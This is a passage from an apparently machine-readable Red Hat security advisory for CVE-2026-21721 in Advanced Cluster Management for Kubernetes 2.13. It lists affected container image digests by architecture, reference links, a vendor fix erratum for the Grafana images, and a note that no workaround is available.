"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-21721"
},
{
"category": "external",
"summary": "RHBZ#2433242",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433242"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-21721",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21721"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-21721",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21721"
},
{
"category": "external",
"summary": "https://grafana.com/security/security-advisories/CVE-2026-21721",
"url": "https://grafana.com/security/security-advisories/CVE-2026-21721"
}
],
"release_date": "2026-01-27T09:07:55.160000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-15T02:15:09+00:00",
"details": "Before you apply this update, make sure all previously released errata\nthat are relevant to your system are applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8229"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
